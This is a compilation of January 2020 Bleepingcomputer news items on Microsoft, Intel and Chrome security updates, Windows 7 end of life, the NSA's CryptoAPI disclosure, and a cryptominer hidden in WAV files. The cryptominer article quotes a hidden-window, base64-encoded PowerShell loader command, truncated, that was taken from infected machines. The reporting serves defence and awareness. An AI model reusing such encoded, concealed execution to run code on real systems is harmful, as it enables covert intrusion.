If you want to continue using the Classic Microsoft Edge, Microsoft has released a tool called the 'Microsoft Edge Blocker Toolkit' to prevent the forced installation of Chromium Edge.

With Blocker Toolkit, you can prevent Microsoft from replacing the current Edge browser on your Windows 10 Home, Pro or Enterprise systems.

The Blocker Toolkit only prevents the browser from being automatically installed via Windows Update on Windows 10 RS4 and newer.
The Blocker Toolkit will not prevent users from manually installing Microsoft Edge after you have blocked Windows Update.
Organizations do not need to deploy the Blocker Toolkit in environments managed with an update management solution such as Windows Server Update Services or System Center Configuration Manager. Organizations can use those products to fully manage the deployment of updates released through Windows Update and Microsoft Update, including Microsoft Edge (Chromium-based), within their environment.
Microsoft says Blocker Toolkit may create a Registry value that blocks the automatic installation of the new Microsoft Edge on Windows 10 April 2018 Update (version 1803) or newer.

The Registry value is created under the HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\EdgeUpdate key and value is called DoNotUpdateToEdgeWithChromium.

When you use the tool, the value is set to 1 and Edge installation via Windows Update will be blocked. If the value is 0 or not set, Edge will be automatically downloaded and installed.

You can learn more about this process in our dedicated article: How to Block Windows 10 Update Force Installing the New Edge Browser.


Microsoft Office January Security Updates Fix Code Execution Bugs
20.1.2020 
Bleepingcomputer  OS

Microsoft released the January 2019 Office security updates, bundling a total of seven security updates and three cumulative updates for five different products, six of them patching flaws allowing remote code execution.

Redmond also released the January 2020 Patch Tuesday security updates, with security updates for 49 vulnerabilities, seven of them being classified as Critical and 41 as Important.

Unlike previous Patch Tuesday releases, Microsoft did not publicly disclose any vulnerabilities found to be actively exploited in the wild.

To download Microsoft Office security updates on your device, you have to click on the corresponding Knowledge Base article in the table below and then scroll down to the "How to download and install the update" section to grab the update packages for each product.

Patched Microsoft Office vulnerabilities
Out of the seven security updates released by Microsoft for several Office products, six patch remote code execution (RCE) bugs detailed in the CVE-2020-0650, CVE-2020-0651, and CVE-2020-0652 security advisories, and impacting Office 2016, Office 2013, Office 2010, Excel 2016, Excel 2013, and Excel 2010.

The RCE security vulnerabilities patched today received a severity rating of 'Important' from Microsoft given that they could allow potential attackers to execute arbitrary code and/or commands after successfully exploiting vulnerable Windows devices.

Attackers could then install programs, view, change, and delete data, or create new accounts with full user rights on the compromised computers.

The other security update tracked as CVE-2020-0647 is a Microsoft Office Online spoofing vulnerability impacting Office Online Server and is caused by incorrect validation of origin in cross-origin communications.

"The attacker who successfully exploited the vulnerability could then perform cross-origin attacks on affected systems," Microsoft explains.

"These attacks could allow the attacker to read content that the attacker is not authorized to read, and use the victim's identity to take actions on the site on behalf of the victim. The victim needs to be authenticated for an attacker to compromise the victim."

January 2020 Microsoft Office security updates
The January Microsoft Office security updates are available via the Download Center and the Microsoft Update platform.

Additional info on each of them is available within the linked knowledge base articles.

Microsoft Office 2016
Product Knowledge Base article title and number
Excel 2016 Security update for Excel 2016: January 14, 2020 (KB4484217)
Office 2016 Security update for Office 2016: January 14, 2020 (KB4484221)
Microsoft Office 2013
Product Knowledge Base article title and number
Excel 2013 Security update for Excel 2013: January 14, 2020 (KB4484234)
Office 2013 Security update for Office 2013: January 14, 2020 (KB4484227)
Microsoft Office 2010
Product Knowledge Base article title and number
Excel 2010 Security update for Excel 2010: January 14, 2020 (KB4484243)
Office 2010 Security update for Office 2010: January 14, 2020 (KB4484236)
Microsoft SharePoint Server 2019
Product Knowledge Base article title and number
Office Online Server Security update for Office Online Server: January 14, 2020 (KB4484223)
Microsoft SharePoint Server 2013
Product Knowledge Base article title and number
Project Server 2013 January 14, 2020, cumulative update for Project Server 2013 (KB4484230)
SharePoint Enterprise Server 2013 January 14, 2020, cumulative update for SharePoint Enterprise Server 2013 (KB4484232)
SharePoint Foundation 2013 January 14, 2020, cumulative update for SharePoint Foundation 2013 (KB4484228)


Windows 7 Begins to Show Full Screen Windows 10 Upgrade Alerts
20.1.2020 
Bleepingcomputer  OS

When users log into Windows 7 today, they should not be surprised if they see a full-screen alert telling them that the operating system is no longer supported, they are vulnerable to viruses, and that they should upgrade to Windows 10 to fix all of these issues.

Yesterday, January 14th, 2020, Windows 7 officially reached the end of life, which means it will no longer be supported, receive free security updates, and bug fixes.

As a way of warnings users and promoting Windows 10 at the same time, Microsoft installed a program called EOSNotify in the December Windows 7 KB4530734 Monthly Rollup.

Since then, every time a Windows 7 user logged into their computer and at noon every day, a scheduled task was started that launched the %windir%\system32\EOSNotify.exe program.

Once the date reached January 15th, 2020, instead of lying dormant and not displaying anything, the program began to show full-screen alerts that cover your entire screen, including the desktop, on all Windows 7 machines around the world. What you see below, is all you will see on your monitor when the alert is displayed as it covers the entire screen.

Windows 7 End of Life alert
Windows 7 End of Life alert
For users who do not have the time to read it, they can click on the "Remind me later" button to close the alert and have it be shown again at a later date.

If users never want to see this alert again, they can click on the 'Don't remind me again' button.

For users who have not been shown this alert yet, they can configure the following registry key to prevent it from ever being displayed in the first place.

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\EOSNotify]
"DiscontinueEOS"=dword:00000001

For those who want more technical information about how this alert works, you can read our original reporting on the EOSNotify application.

While most of us who commonly use computers already known that Windows 7 is no longer supported, many have no idea.

As annoying and intrusive as this alert is, it makes sense to display it to let everyone know that their system will no longer be adequately protected.

This allows them to make an educated decision as to whether they want to upgrade to Windows 10, which can still be done for free, switch to a Mac, or even give Linux and its Windows 7 theme a try.


Google Chrome Aims to Make Browser User-Agents Obsolete
20.1.2020 
Bleepingcomputer  Security

To enhance the privacy of its users and reduce the complexity of updating User-Agent strings, Google Chrome plans to move to a new system that web sites can use to identify information about their visitors.

When connecting to a web site, a browser will send a User-Agent string to the webserver that can be used to identify the name of the browser, its version, the operating system, and its rendering engine.

Web sites can use this browser information to determine what type of content they will send back or if their site even supports the browser.

As time has gone on and browsers have integrated various technology from other companies, User-Agent strings have become convoluted and unwieldy.

For example, below is the user-agent for Chrome 79.0.3945.117, which as you can see also includes confusing references to other browsers such as Safari and Mozilla.

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36
Even worse, due to the specific information contained in them, User-Agents are a privacy risk as Google states they are commonly used by fingerprinter scripts to track users.

Google wants to freeze the User-Agent and switch to Client Hints
To increase the privacy of their users and still allow web sites to get information about a client, Chrome developer Yoav Weiss intends to move away from user-agent strings and instead adopt the HTTP specification called 'UA Client Hints'.

"The User-Agent string is an abundant source of passive fingerprinting information about our users. It contains many details about the user’s browser and device as well as many lies ("Mozilla/5.0", anyone?) that were or are needed for compatibility purposes, as servers grew reliant on bad User Agent sniffing.

On top of those privacy issues, User-Agent sniffing is an abundant source of compatibility issues, in particular for minority browsers, resulting in browsers lying about themselves (generally or to specific sites), and sites (including Google properties) being broken in some browsers for no good reason."

What Weiss proposes is to eventually freeze the User-Agent string of Google Chrome so that they always send the same string regardless of the browser's version.

For example, the Chrome Mobile User-Agent would be frozen at:

Mozilla/5.0 (Linux; Android 9; Unspecified Device) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/71.1.2222.33 Mobile Safari/537.36
The Chrome Desktop User-Agent would be frozen at:

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.1.2222.33 Safari/537.36
When a user visits a web site, the request will contain the frozen UA string as well as a special 'Sec-UA' header that contains basic information about the client as shown below.

Sec-CH-UA: "Examplary Browser 73"
If a web site needs more than this basic information, they would request it in an 'opt-in' response header that asks for more detailed information such as the minor version and the operating system of the visitor.

This could be done via the following header request:

Accept-CH: UA, Platform
As the web site has not opted into this information being sent, the browser would respond on all subsequent requests with headers containing the requested information:

Sec-CH-UA: "Examplary Browser 73.3R8.2H.1"
Sec-CH-Platform: "Windows 10"
Ultimately, though, it will be up to the browser whether they will honor these requests for more information and what information is being sent to the website.

This means that if a request comes from a site that is known to be abusive, Google can decide not to send any further client information back to them.

To use Client Hints, a web site must first satisfy the following requirements:

Server opt-ins must be delivered on a top-level navigation request, over a secure connection.
Hints are only delivered with same-origin requests, over a secure connection.
If the first party wants hints to be delivered to certain third-party hosts, the first-party can explicitly delegate specific hints to specific hostnames.
Hints are Sec- prefixed, to provide servers with more confidence regarding the values they deliver, as well as to avoid legacy server bugs.
As part of this plan, Google hopes to remove access to the navigator.userAgent JavaScript property in Chrome 81, freeze the browser's User-Agent string in Chrome 83, and unify all desktop and mobile versions to the same string in Chrome 85.

Milestone

Stable date

Action

M81

Mid March ‘20

Deprecate access to `navigator.userAgent`

M83

Early June ‘20

Freeze browser version and unify OS versions

M85

Mid September ‘20

Unify desktop OS string as a common value for desktop browsers.

Unify mobile OS/device strings as a similarly common value for those at M85 (*)

Other vendors, such as Microsoft and Mozilla, have indicated that they support this change, while Safari already froze their UA string to some degree other than operating system version changes.

Concerns about using Client Hints
Switching to Client Hints as a method for web sites to gain information about a client appears to be a good idea but does have some issues.

As Client Hints will only be usable by the top-level navigation request, third-parties scripts that require User-Agent information will need to work with websites to receive this information.

Furthermore, as the browser does not send detailed information about the client in the first request, there will be a delay in getting detailed information for sites that need it.


Windows BSOD Betrays Cryptominer Hidden in WAV File
20.1.2020 
Bleepingcomputer  Cryptocurrency  OS

The infamous blue screen of death (BSOD) on computers belonging to a company in the medical tech sector was the tell for a malware infection that spread across more than half the network.

The malware was hiding its modules in WAV audio files and spread to vulnerable Windows 7 machines on the network via EternalBlue, the exploit for SMBv1 used in the devastating WannaCry and NotPetya cyber attacks from 2017.

EternalBlue and cryptojacking
Security researchers providing incident response services found that more than 800 computers had been compromised starting October 14, 2019. The discovery was possible by investigating systems that experienced a BSOD crash since that date.

With the lack of kernel memory dumps, which would have pointed to what triggered the error, the researchers from Guardicore relied on attack residue data to determine the cause.

They found that infected machines accessed data in a registry key (HKLM\Software\Microsoft\Windows\CurrentVersion\Shell) and executed a rather long command, which turned out to be an unclassified, but publicly available, PowerShell script encoded with base-64.

C:\Windows\System32\WindowsPowershell\v1.0\PowerShell.exe -NonInteractive -WindowStyle Hidden -EncodeCommand JABTAEUAZgA4AGMAYQBXAGoAIAA9ACAAIgBIAEsATABNADoAXABTAG8AZgB0AHcAYQByAGUAXABNAG…==
An endpoint detection and response (EDR) platform the company installed in its attempt to solve the problem revealed that the malware-loading process consisted of deploying two processes named cscdll.dll and cscomp.dll, tasked with "compiling C# and executed when C# code is loaded and executed from memory."


The payload was a module that mines for Monero cryptocurrency using the CryptonightR algorithm. To evade detection, the authors resorted to steganography to embedded it in WAV‌ audio files. As a result, the files seem harmless but carry an extra load that is later extracted and executed on an infected host.

This exact technique was reported on October 16 last year by researchers at BlackBerry Cylance, who said that some of the audio could be played and “had no discernible quality issues or glitches.” However, Guardicore saw it integrated in a full attack flow.

Another module hidden this way was tasked with scanning the network and for lateral movement. “The code implements the infamous EternalBlue exploit and spreads the malware over SMB,” reads Guardicore Lab Team’s analysis.

Weak spots
While this attack is not sophisticated, it shows that some mid-size organizations are ill-prepared to defend against a cybersecurity incident and set up the environment to support post-infection analysis efforts.

For this particular case, the victim company used Windows 7, an operating system that on Tuesday received its last batch of updates and is no longer supported by Microsoft.

This may have not been relevant for the attack but leaving the systems unpatched for almost three years is what provided the opportunity to spread to over 50% of the network computers.

Guardicore hit some bumps during their investigation because the computers analyzed had not been configured to save kernel memory dumps, “which could have been helpful in forensics analysis and in understanding the root cause of the [BSOD] errors.”


Intel Patches High Severity Flaw in VTune Performance Profiler
20.1.2020 
Bleepingcomputer  Vulnerebility

Intel patched six security vulnerabilities during the January 2020 Patch Tuesday, including a high severity vulnerability in VTune and a bug affecting the Intel Processor Graphics drivers for Windows and Linux.

The security issues addressed today are detailed in the six security advisories published on Intel's Product Security Center.

According to Intel, these vulnerabilities could allow authenticated users to potentially trigger denial of service states and escalate privileges via local access, while others could lead to information disclosure.

"This month, consistent with our commitment to transparency, we are releasing 6 security advisories addressing 6 vulnerabilities," Intel's Director of Security Communications Jerry Bryant said.

"Three of these, including the one with the highest CVSS severity rating of 8.2, were internally found by Intel, and the others were reported through our Bug Bounty program."

Intel's January 2020 Patch Tuesday advisories
Below you can find all the advisories published by Intel during 2020's first Patch Tuesday, together with links to download pages where you can get the updates needed to patch the security flaws.

While Intel says that they are not aware of any of the security issues being exploited in the wild, users are advised to install the updates as soon as possible.

Out of the six vulnerabilities patched today two stand out. The first one tracked as CVE-2019-14613 is a high severity one impacting the Intel VTune Amplifier for Windows that may allow authenticated local attackers to potentially escalate privileges.

The other one is a medium severity information disclosure flaw tracked as CVE-2019-14615 that affects the Windows and Linux graphics drivers on a wide range of processors including the company's latest 10th Generation 'Ice Lake' Intel Core Processors.

Advisory Number Advisory CVE ID Severity rating Updates
INTEL-SA-00325 Intel VTUNE CVE-2019-14613 8.2 DOWNLOAD
INTEL-SA-00308 Intel RWC 3 for Windows CVE-2019-14601 6.7 DOWNLOAD
INTEL-SA-00300 Intel SNMP Subagent Stand-Alone for Windows CVE-2019-14600 6.5 DISCONTINUED
INTEL-SA-00314 Intel Processor Graphics CVE-2019-14615 6.3 DOWNLOAD
INTEL-SA-00306 Intel Chipset Device Software INF Utility CVE-2019-14596 5.9 DOWNLOAD
INTEL-SA-00332 Intel DAAL CVE-2019-14629 3.9 DOWNLOAD
"Intel has released security updates to address vulnerabilities in multiple products," the Cybersecurity and Infrastructure Security Agency (CISA) said today in a notification. "An authenticated attacker with local access could exploit some of these vulnerabilities to gain escalation of privileges."

The agency encourages both users and administrators to review the security advisories published today by Intel and apply the necessary updates to defend against potential exploitation attempts.

Each of the linked advisories comes with a detailed list of all affected products and recommendations for vulnerable products, as well as contact info for users and researchers who would want to report other vulnerabilities found in Intel branded tech or products.


Windows Terminal Adds Retro CRT Effects and Console Search
20.1.2020 
Bleepingcomputer  OS

Microsoft released Windows Terminal Preview v.08 today and with it comes useful improvements that include a console search feature, tab sizing, and a new retro option that makes consoles look like an old CRT.

The Windows Terminal app is a new multi-tab console application being developed by Microsoft that allows users to have multiple console tabs open in one window. These tabs can be a mix of CMD prompts, PowerShell consoles, and different shells from Linux distributions installed via the Windows Subsystem for Linux (WSL).

Below we have outlined the major features added in this build.

New Search feature
With this release, users can now search for text within an open console window by using the Ctrl+Shift+F keyboard combination.

New search feature
New search feature
If you are like me and wish the Find feature used the Ctrl+F keyboard combination, you can change it by adding a new keybinding like the following:

"keybindings": [
{ "command": "find", "keys": [ "ctrl+f" ] }
]
New Tab width setting
By default, Windows Terminal will display equal width tabs for every open tab.

Version 0.8 introduces a new tabWidthMode global setting that can be set to either 'equal' or 'titleLength'. If set to titleLength, the width of the tabs will be equal (with a little padding) to the title of the tab as shown below.

New tabWidthMode setting
New tabWidthMode setting
Retro
Finally, Microsoft added a fun experimental feature that emulates a retro CRT when displaying the console.

This feature is controlled by the 'experimental.retroTerminalEffect' setting that when set to true will cause the fonts to glow and the console to show scanlines.

This is illustrated in a Linux shell running Midnight Commander below.

New retro mode with scanlines and glowing fonts
New retro mode with scanlines and glowing fonts
To enable the retro Terminal effect, you can add the following setting to a profile:

"experimental.retroTerminalEffect": 1,
For the above example, Windows Terminal Program Manager Kayla Cinnamon told BleepingComputer that she set her "color scheme to Vintage and am using the PxPlus IBM VGA8 font from here: https://int10h.org/oldschool-pc-f."

For those who do not have the Vintage color scheme, it is:

{
"name": "Vintage",
"foreground": "#C0C0C0",
"background": "#000000",
"black": "#000000",
"red": "#800000",
"green": "#008000",
"yellow": "#808000",
"blue": "#000080",
"purple": "#800080",
"cyan": "#008080",
"white": "#C0C0C0",
"brightBlack": "#808080",
"brightRed": "#FF0000",
"brightGreen": "#00FF00",
"brightYellow": "#FFFF00",
"brightBlue": "#0000FF",
"brightPurple": "#FF00FF",
"brightCyan": "#00FFFF",
"brightWhite": "#FFFFFF"
}
More information about these settings and other changes can be read in v0.8's release notes.


NSA's First Public Vulnerability Disclosure: An Effort to Build Trust
20.1.2020 
Bleepingcomputer  BigBrothers

The U.S. National Security Agency (NSA) started a new chapter after discovering and reporting to Microsoft a vulnerability tracked as CVE-2020-0601 and impacting Windows 10 and Windows Server systems.

In a phone conference that Bleeping Computer joined, NSA's Director of Cybersecurity Anne Neuberger said that this is the first time the agency decided to publicly disclose a security vulnerability to a software vendor.

"We thought hard about that. When Microsoft asked us, 'Can we attribute this vulnerability to NSA?' we gave it a great deal of thought. And then we elected to do so and here is why," Neuberger explained.

She added that "part of building trust is showing the data" and, as a result, "it's hard for entities to trust that we indeed take this seriously and ensuring that vulnerabilities can be mitigated is an absolute priority."

Neuberger also said during the media call that the agency will make efforts towards becoming an ally to the cybersecurity community and private sector entities, and will begin to share vulnerability data with its partners instead of accumulating it and using it in future offensive operations.

"Sources say this disclosure from NSA is planned to be the first of many as part of a new initiative at NSA dubbed 'Turn a New Leaf,' aimed at making more of the agency's vulnerability research available to major software vendors and ultimately to the public," journalist Brian Krebs reported.

NSA redefining itself
"We believe in Coordinated Vulnerability Disclosure (CVD) as proven industry best practice to address security vulnerabilities," MSRC's Principal Security Program Manager Mechele Gruhn added.

"Through a partnership between security researchers and vendors, CVD ensures vulnerabilities are addressed prior to being made public."

NSA's new approach to building trust with the public and its partners redefines the agency's cybersecurity mission as US Army General and NSA Director Paul M. Nakasone stated in July 2019.

"The Cybersecurity Directorate will reinvigorate our white hat mission opening the door to partners and customers on a wide variety of cybersecurity efforts," he added at the time.

"It will also build on our past successes such as Russia Small Group to operationalize our threat intelligence, vulnerability assessments, and cyber defense expertise to defeat our adversaries in cyberspace."

The NSA-reported vulnerability
The CVE-2020-0601 spoofing vulnerability reported by the NSA affects the Windows CryptoAPI and is caused by the way Elliptic Curve Cryptography (ECC) certificates are validated.

"The certificate validation vulnerability allows an attacker to undermine how Windows verifies cryptographic trust and can enable remote code execution," the NSA says.

CVE-2020-0601 hasn't yet been exploited in the wild according to Microsoft's security advisory, and the US agency advises users and organizations to install the patches released as part of Microsoft's January 2020 Patch Tuesday as soon as possible to block attackers from defeating "trusted network connections and deliver executable code while appearing as legitimately trusted entities."

NSA/CSS

@NSAGov
This #PatchTuesday you are strongly encouraged to implement the recently released CVE-2020-0601 patch immediately. https://media.defense.gov/2020/Jan/14/2002234275/-1/-1/0/CSA-WINDOWS-10-CRYPT-LIB-20190114.PDF …


2,792
7:31 PM - Jan 14, 2020
Twitter Ads info and privacy
2,562 people are talking about this
"This vulnerability is one example of our partnership with the security research community where a vulnerability was privately disclosed and an update released to ensure customers were not put at risk," Gruhn added.

The NSA security advisory also comes with mitigation measures for systems where installing the patches released by Microsoft today is not immediately possible.

"Properly configured and managed TLS inspection proxies independently validate TLS certificates from external entities and will reject invalid or untrusted certificates, protecting endpoints from certificates that attempt to exploit the vulnerabilities," the agency reveals.

"Ensure that certificate validation is enabled for TLS proxies to limit exposure to this class of vulnerabilities and review logs for signs of exploitation."

The consequences of not patching the vulnerability are severe and widespread. Remote exploitation tools will likely be made quickly and widely available. Rapid adoption of the patch is the only known mitigation at this time and should be the primary focus for all network owners. - NSA


Windows 7 Gets Final Monthly Rollup Update Before End Of Life
20.1.2020 
Bleepingcomputer  Vulnerebility

Windows 7 has just received its last set of security updates. After today, Windows 7 won't receive any security or non-security updates from Microsoft, and it is now considered an unsupported operating system.

The new monthly rollup and non-security update for Windows 7 come with a couple of security fixes. Microsoft says KB4534310 for Windows 7 has resolved security issues affecting Windows Cryptography, Windows Input and Composition, Windows Management, and other components.

The full changelog of the update includes:

Security updates to Windows App Platform and Frameworks, Windows Input and Composition, Windows Management, Windows Cryptography, Windows Storage and Filesystems, the Microsoft Scripting Engine, and Windows Server.
Microsoft has also published Servicing Stack Update (SSU) KB4536952 to improve Windows Update performance on Windows 7.

The last update for Windows 7 applies to all its editions or versions including Windows 7, Service Pack 1, Windows Server 2008 R2 Service Pack 1, Windows Embedded Standard 7 Service Pack 1, Windows Embedded, POSReady 7, and Windows Thin PC.

You can download and install the latest patches by checking for updates in Control Panel. You can also grab the offline installer by downloading the package from the Microsoft Update website.

Windows 7 EoL
After January 14, devices with Windows 7 will need to be upgraded to Windows 10 for continued support, updates and patches from Microsoft. Consumers or businesses will miss out the latest technologies, apps, security updates, and support if they use Windows 7 despite its EoL (End of Life).

In a support doc, Microsoft has stated that it will display a full-screen upgrade warning notification on Windows 7 PCs from January 15. The notification will remain on the screen until you interact with it on your PC running:

Starter.
Home Basic.
Home Premium.
Professional (No such notifications if you have purchased the Extended Security Update).
Ultimate.
It's also important to note that Microsoft has never blocked the free upgrades to Windows 10, and you can upgrade to Windows 10 today for free by following our guide.

Windows 7 Extended Security Updates (ESUs)
Companies, organizations and small businesses may pay Microsoft and extend support by up to three years. According to Microsoft's Windows 7 ESUs policy, enterprise customers may pay $50, $100, or $200 per year get security updates for Windows 7 Pro or Enterprise.

Security company 0Patch is also planning to release security updates for Windows 7 for free in the coming weeks.


Microsoft's January 2020 Patch Tuesday Fixes 49 Vulnerabilities
20.1.2020 
Bleepingcomputer  Vulnerebility

Today is Microsoft's January 2020 Patch Tuesday and also the Windows 7 end of life. This is going to be a stressful day for your Windows administrators, so be nice!

With the release of the January 2020 security updates, Microsoft has released fixes for 49 vulnerabilities. Of these vulnerabilities, 7 are classified as Critical, 41 as Important, and 1 as Moderate.

One of the 'Critical' vulnerabilities fixed today was discovered by the NSA and could allow attackers to spoof digital certificates or perform man-in-the-middle (MiTM) attacks.

More information about the 'CVE-2020-0601 - Windows CryptoAPI Spoofing' vulnerability can be found below and in our dedicated article: Microsoft Fixes Windows CryptoAPI Spoofing Flaw Reported by NSA.

The good news is that there were no vulnerabilities publicly disclosed or found being actively exploited in the wild.

Users should still install these security updates as soon as possible to protect Windows from known security risks.

For information about the non-security Windows updates, you can read about today's Windows 10 January 2020 Cumulative Updates.

CVE-2020-0601 - Windows CryptoAPI Spoofing Vulnerability
The big news of the day is the first Windows vulnerability being publicly attributed as discovered by the United State's National Security Agency (NSA).

While more detailed information is found in our dedicated article, this Patch Tuesday security update article would not be complete without a summary of the vulnerability.

The CVE-2020-0601 vulnerability is a flaw in how the Windows CryptoAPI (Crypt32.dll) validates Elliptic Curve Cryptography (ECC) certificates.

Using this flaw attackers could cause malware to appear as code-signed by legitimate companies, conduct man-in-the-middle attacks, and decrypt encrypted information over network connections.

This is a critical vulnerability and all Windows users are advised to install this patch immediately.

Critical Windows Remote Desktop Gateway vulnerabilities
The January 2020 Patch Tuesday also fixes three vulnerabilities in the Windows Remote Desktop Gateway (RD Gateway).

Two of the vulnerabilities (CVE-2020-0609 and CVE-2020-0610) could allow an unauthenticated attacker to perform remote code execution on a vulnerable system.

"A remote code execution vulnerability exists in Windows Remote Desktop Gateway (RD Gateway) when an unauthenticated attacker connects to the target system using RDP and sends specially crafted requests. This vulnerability is pre-authentication and requires no user interaction. An attacker who successfully exploited this vulnerability could execute arbitrary code on the target system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.

To exploit this vulnerability, an attacker would need to send a specially crafted request to the target systems RD Gateway via RDP."

The third vulnerability (CVE-2020-0612) could allow an attacker to perform a denial of service (DoS) on an RDP system and cause it to stop responding.

"A denial of service vulnerability exists in Windows Remote Desktop Gateway (RD Gateway) when an attacker connects to the target system using RDP and sends specially crafted requests. An attacker who successfully exploited this vulnerability could cause the RD Gateway service on the target system to stop responding."

If you use RD Gateway in your organization you must install this update.

The January 2020 Patch Tuesday Security Updates
Below is the full list of resolved vulnerabilities and released advisories in the January 2020 Patch Tuesday updates. To access the full description of each vulnerability and the systems that it affects, you can view the full report here.

Tag CVE ID CVE Title Severity
.NET Framework CVE-2020-0606 .NET Framework Remote Code Execution Vulnerability Critical
.NET Framework CVE-2020-0605 .NET Framework Remote Code Execution Vulnerability Critical
.NET Framework CVE-2020-0646 .NET Framework Remote Code Execution Injection Vulnerability Critical
Apps CVE-2020-0654 Microsoft OneDrive for Android Security Feature Bypass Vulnerability Important
ASP.NET CVE-2020-0603 ASP.NET Core Remote Code Execution Vulnerability Critical
ASP.NET CVE-2020-0602 ASP.NET Core Denial of Service Vulnerability Important
Common Log File System Driver CVE-2020-0615 Windows Common Log File System Driver Information Disclosure Vulnerability Important
Common Log File System Driver CVE-2020-0634 Windows Common Log File System Driver Elevation of Privilege Vulnerability Important
Common Log File System Driver CVE-2020-0639 Windows Common Log File System Driver Information Disclosure Vulnerability Important
Microsoft Dynamics CVE-2020-0656 Microsoft Dynamics 365 (On-Premise) Cross Site Scripting Vulnerability Important
Microsoft Graphics Component CVE-2020-0622 Microsoft Graphics Component Information Disclosure Vulnerability Important
Microsoft Graphics Component CVE-2020-0607 Microsoft Graphics Components Information Disclosure Vulnerability Important
Microsoft Graphics Component CVE-2020-0642 Win32k Elevation of Privilege Vulnerability Important
Microsoft Graphics Component CVE-2020-0643 Windows GDI+ Information Disclosure Vulnerability Important
Microsoft Office CVE-2020-0650 Microsoft Excel Remote Code Execution Vulnerability Important
Microsoft Office CVE-2020-0652 Microsoft Office Memory Corruption Vulnerability Important
Microsoft Office CVE-2020-0653 Microsoft Excel Remote Code Execution Vulnerability Important
Microsoft Office CVE-2020-0651 Microsoft Excel Remote Code Execution Vulnerability Important
Microsoft Office CVE-2020-0647 Microsoft Office Online Spoofing Vulnerability Important
Microsoft Scripting Engine CVE-2020-0640 Internet Explorer Memory Corruption Vulnerability Moderate
Microsoft Windows CVE-2020-0644 Windows Elevation of Privilege Vulnerability Important
Microsoft Windows CVE-2020-0624 Win32k Elevation of Privilege Vulnerability Important
Microsoft Windows CVE-2020-0635 Windows Elevation of Privilege Vulnerability Important
Microsoft Windows CVE-2020-0620 Microsoft Cryptographic Services Elevation of Privilege Vulnerability Important
Microsoft Windows CVE-2020-0616 Microsoft Windows Denial of Service Vulnerability Important
Microsoft Windows CVE-2020-0608 Win32k Information Disclosure Vulnerability Important
Microsoft Windows CVE-2020-0601 Windows CryptoAPI Spoofing Vulnerability Important
Microsoft Windows CVE-2020-0621 Windows Security Feature Bypass Vulnerability Important
Microsoft Windows Search Component CVE-2020-0633 Windows Search Indexer Elevation of Privilege Vulnerability Important
Microsoft Windows Search Component CVE-2020-0623 Windows Search Indexer Elevation of Privilege Vulnerability Important
Microsoft Windows Search Component CVE-2020-0613 Windows Search Indexer Elevation of Privilege Vulnerability Important
Microsoft Windows Search Component CVE-2020-0614 Windows Search Indexer Elevation of Privilege Vulnerability Important
Microsoft Windows Search Component CVE-2020-0632 Windows Search Indexer Elevation of Privilege Vulnerability Important
Microsoft Windows Search Component CVE-2020-0627 Windows Search Indexer Elevation of Privilege Vulnerability Important
Microsoft Windows Search Component CVE-2020-0628 Windows Search Indexer Elevation of Privilege Vulnerability Important
Microsoft Windows Search Component CVE-2020-0625 Windows Search Indexer Elevation of Privilege Vulnerability Important
Microsoft Windows Search Component CVE-2020-0626 Windows Search Indexer Elevation of Privilege Vulnerability Important
Microsoft Windows Search Component CVE-2020-0629 Windows Search Indexer Elevation of Privilege Vulnerability Important
Microsoft Windows Search Component CVE-2020-0631 Windows Search Indexer Elevation of Privilege Vulnerability Important
Microsoft Windows Search Component CVE-2020-0630 Windows Search Indexer Elevation of Privilege Vulnerability Important
Windows Hyper-V CVE-2020-0617 Hyper-V Denial of Service Vulnerability Important
Windows Media CVE-2020-0641 Microsoft Windows Elevation of Privilege Vulnerability Important
Windows RDP CVE-2020-0610 Windows Remote Desktop Gateway (RD Gateway) Remote Code Execution Vulnerability Critical
Windows RDP CVE-2020-0609 Windows Remote Desktop Gateway (RD Gateway) Remote Code Execution Vulnerability Critical
Windows RDP CVE-2020-0637 Remote Desktop Web Access Information Disclosure Vulnerability Important
Windows RDP CVE-2020-0612 Windows Remote Desktop Gateway (RD Gateway) Denial of Service Vulnerability Important
Windows RDP CVE-2020-0611 Remote Desktop Client Remote Code Execution Vulnerability Critical
Windows Subsystem for Linux CVE-2020-0636 Windows Subsystem for Linux Elevation of Privilege Vulnerability Important
Windows Update Stack CVE-2020-0638 Update Notification Manager Elevation of Privilege Vulnerability Important


Windows 10 Cumulative Updates KB4528760 & KB4534273 Released
20.1.2020 
Bleepingcomputer  Vulnerebility

Windows 10's January 2020 cumulative updates are now rolling out with important fixes for Windows 10 November 2019 Update, May 2019 Update, and October 2018 Update.

Like every other cumulative update, January 14 cumulative update for Windows 10 version 1909, 1903, and version 1809 include security fixes for core components and as well as Windows Cryptography.

To grab the update, go to the Windows Update page and click on the 'Check for updates' button to install the patches. If you own multiple PCs or if you would like to patch the PCs manually, you can learn more about it here.

Builds 18362.592 and 18363.592
If you are using the November 2019 Update, you'll be getting 18363.592 (KB4528760). Those who are using Windows 10 May 2019 Update will receive Build 18362.592 with the following changes:

Security updates to Windows App Platform and Frameworks, Windows Input and Composition, Windows Management, Windows Cryptography, Windows Storage and Filesystems, the Microsoft Scripting Engine, and Windows Server.
The update also improves security storing, managing files, and when using input devices such as a mouse or keyboard.

Build 17763.973
Windows 10 KB4534273 (Build 17763.973) for Windows 10 version 1809, Windows Server version 1809, and Windows Server 2019 comes with the following bug fixes:

Addresses an issue to support new SameSite cookie policies by default for release 80 of Google Chrome.
Security updates to Windows App Platform and Frameworks, Windows Input and Composition, Windows Management, Windows Cryptography, Windows Virtualization, the Microsoft Scripting Engine, and Windows Server.
Known issues in this update
Symptom Workaround
Certain operations, such as rename, that you perform on files or folders that are on a Cluster Shared Volume (CSV) may fail with the error, “STATUS_BAD_IMPERSONATION_LEVEL (0xC00000A5)”. This occurs when you perform the operation on a CSV owner node from a process that doesn’t have administrator privilege.
Do one of the following:

Perform the operation from a process that has administrator privilege.
Perform the operation from a node that doesn’t have CSV ownership.
Microsoft is working on a resolution and will provide an update in an upcoming release.
After installing KB4493509, devices with some Asian language packs installed may receive the error, "0x800f0982 - PSFX_E_MATCHING_COMPONENT_NOT_FOUND."
